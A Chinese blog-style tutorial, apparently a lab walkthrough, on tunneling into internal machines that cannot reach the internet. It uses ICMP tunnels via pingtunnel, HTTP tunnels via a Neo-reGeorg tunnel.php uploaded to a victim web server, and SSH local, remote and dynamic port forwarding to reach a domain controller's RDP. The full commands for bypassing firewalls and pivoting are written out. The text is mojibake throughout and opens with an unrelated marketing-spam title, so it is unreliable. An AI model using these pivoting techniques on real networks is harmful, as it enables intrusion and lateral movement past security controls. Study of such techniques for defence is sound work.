學(xué)會建網(wǎng)站如何做網(wǎng)絡(luò)營銷友情鏈接的作用大不大
昨天講了通過代理的形式(端口轉(zhuǎn)發(fā))實現(xiàn)了上線不出網(wǎng)的機器,那么今天就來講一下如何通過隧道上線不出網(wǎng)機器
? ??
目錄
1.網(wǎng)絡(luò)拓?fù)?/p>
2.開始做隧道?No!!!
3.icmp隧道
4.HTTP隧道
5.SSH隧道
1.什么是ssh隧道
2.ssh隧道:端口轉(zhuǎn)發(fā)
3.SSH遠(yuǎn)程端口轉(zhuǎn)發(fā)
4.ssh動態(tài)端口轉(zhuǎn)發(fā)
1.網(wǎng)絡(luò)拓?fù)?/h2>
今天我youyouyouyouyoyoyo又配環(huán)境配到崩潰了,是的,配環(huán)境已經(jīng)給我整麻了(kali的網(wǎng)卡那里感覺有點問題,怎么配都配不好)所以我知難而退,改換橋接!!
?大概是這樣的一個網(wǎng)絡(luò)拓?fù)?/p>
2.開始做隧道?No!!!
第一部肯定不是做隧道啊!,你連防火墻給你通過什么流量都不知道,做啥隧道,做了流量也過不去,所以!!正確的第一步,是通過對應(yīng)的流量探測去制定隧道的種類!!!
3.icmp隧道
所謂的icmp隧道就是:將數(shù)據(jù)包夾帶在icmp的數(shù)據(jù)包中,其中,ICMP 隧道幾乎在所有的網(wǎng)絡(luò)環(huán)境中都是被允許的,因此攻擊者可以通過 ICMP 隧道繞過一些網(wǎng)絡(luò)安全設(shè)備。
但是!!!這個程序似乎在一些低版本的Windows上運行不了(缺少一些系統(tǒng)動態(tài)鏈接庫文件)
雖然win11可以(但是很多內(nèi)網(wǎng)的環(huán)境都是用的win7 winserver這種的)所以適用范圍較窄感覺
即便是這樣,那也還是要將草走復(fù)現(xiàn)一下的!😭😭😭
先是kali上的命令
sysctl -w net.ipv4.icmp_echo_ignore_all=1 //用于禁用本機對icmp流量的應(yīng)答
然后再win7靶機上運行
pingtunnel.exe -type server -noprint 1 -nolog 1
然后kali上運行以下命令,意思就是將本機的8888作為scok5的連接端接口
bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1
最后就在kali上修改一個配置文件
vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可
?就可以遠(yuǎn)程連接了
proxychains rdesktop 192.168.52.138
4.HTTP隧道
這個比較常見,我們經(jīng)常都是通過一個web漏洞去getshell的,所以防火墻一般不會限制http流量
HTTP隧道有特別特別多,今天來分享一個加密隧道穿透 Neoreg-reGeorg
下載連接 :項目概覽 - Neo-reGeorg - GitCode
開整,先再擺一下網(wǎng)絡(luò)拓?fù)?#xff0c;以免忘記
先在kali上運行,k后面可以跟上你自己的密碼
python neoreg.py -k "你的密碼"
然后判斷網(wǎng)站的語言,我這個win7上搭建的是php的網(wǎng)站
我們在執(zhí)行完kali的命令之后會生成一個文件夾
?? ? ? --->? ? ? ?
選擇對應(yīng)的網(wǎng)站語言扔上去 (我這里扔的是tunnel.php)可以看見能成功訪問
于是就在kali上執(zhí)行這個命令,意思就是開本地的8888端口來連接遠(yuǎn)程的php文件
python neoreg.py -k "你的密碼" -u http://192.168.3.58/tunnel.php -p 8888
這就可以了???,肯定不是啊,你還沒開socks5的本地代理端口,咳咳咳,差點忘記說了
這個工具建立的是socks5代理,所以你就開啟對應(yīng)的代理端口
vim /ect/proxychains4.conf
?在這個文件的最底端加上這個指令 socks5 127.0.0.1 8888
然后就可以連接啦!!!!? ? ?
proxychains rdesktop 192.168.52.138 //這個可以直接寫內(nèi)網(wǎng)的地址!!!
?這樣就能成功連接上去了!!!!嘿嘿嘿
?當(dāng)然了,http隧道可不止這一種,tunna abptts pivotnaacci 這些都是http的隧道,就不多枚舉了
5.SSH隧道
眾所周知,在實戰(zhàn)中一般服務(wù)器都是的Linux_like的,于是小編就去下載了一個Ubuntu來玩一下
是時候該更新網(wǎng)絡(luò)拓?fù)淅?/p>
? ?? 于是這樣我們就有了一臺新的Linux服務(wù)器,
可以搞事情了
直接訪問它的網(wǎng)站根目錄下的文件hhhh~~~
??
1.什么是ssh隧道
在實際中,大部分的Linux服務(wù)器都支持ssh協(xié)議,內(nèi)網(wǎng)中的主機和設(shè)備以及邊界的防火墻都允許ssh流量通過,但是!!!ssh除了可以遠(yuǎn)程連接,還可以轉(zhuǎn)發(fā)流量,并且是加密轉(zhuǎn)發(fā),進(jìn)而突破防火墻限制
2.ssh隧道:端口轉(zhuǎn)發(fā)
首先確定Ubuntu的22端口開放,以及知道它的賬號密碼 ,就可以在kali進(jìn)行以下操作
ssh -L 8887 192.168.52.138:3389 whoami@192.168.3.61 -p 22
這個的意思就是
- kali先通過連接Ubuntu服務(wù)器
- 又因為Ubuntu可以和內(nèi)網(wǎng)通信, -L 意思為將靶機的3389端口的流量準(zhǔn)發(fā)到攻擊機的8887端口
- 當(dāng)kali訪問本地的8887就等于在訪問內(nèi)網(wǎng)DC的3389端口
這樣就可以同時連接上兩臺服務(wù)器!!!
3.SSH遠(yuǎn)程端口轉(zhuǎn)發(fā)
這個和本地端口轉(zhuǎn)發(fā)有點類似不過要先獲取它的root權(quán)限,這個Linux不用于Linux
蟻劍是無法執(zhí)行ssh的,而且上線cs有點困難我不會,于是就要在ubuntu上面敲這個代碼
ssh -R 8887:192.168.52.138:3389 kali@192.168.3.57 -p 22
前提是你的攻擊機器kali開啟22端口!!可以這樣查看
sudo systemctl status ssh
沒開啟的話開啟就好
sudo systemctl start ssh
然后在你的Ubuntu上面輸入kali的密碼就能成功連接了
但是,在你連接上了內(nèi)網(wǎng)DC的時候,Ubuntu也是連接上了你的kali
如果你的虛擬機配置不當(dāng),或者說別的大佬有0day,是可以造成虛擬機越獄的,那到時候你就慘了
4.ssh動態(tài)端口轉(zhuǎn)發(fā)
所謂的動態(tài)端口轉(zhuǎn)發(fā)就是建立起一個ssh加密的socks4/5的代理隧道,我們需要在kali運行以下命令
ssh -D 8888 whoami@192.168.3.61
然后就能連接上Ubuntu了,其中的 -D意為建立socks5隧道流量走8888端口,去連接ubutu的22端口
當(dāng)然了,以上能成功,是在socks5代理成功配置的情況下噢
滿足上述條件,就能實現(xiàn)內(nèi)網(wǎng)穿透了,遠(yuǎn)程上線成功!!!!
以上,就是多種的協(xié)議對應(yīng)的一些隧道!!當(dāng)然還有很多,像DNS ,RDP ,IPV6都是有對應(yīng)隧道的,這里我就不枚舉了!!
?明天講什么呢?? 講隧道穿透利用方法, 多層代理,反正向代理,多級代理,節(jié)點加密,節(jié)點穿透,對應(yīng)工具部署!!!! Byd我都期待起來了!!?
????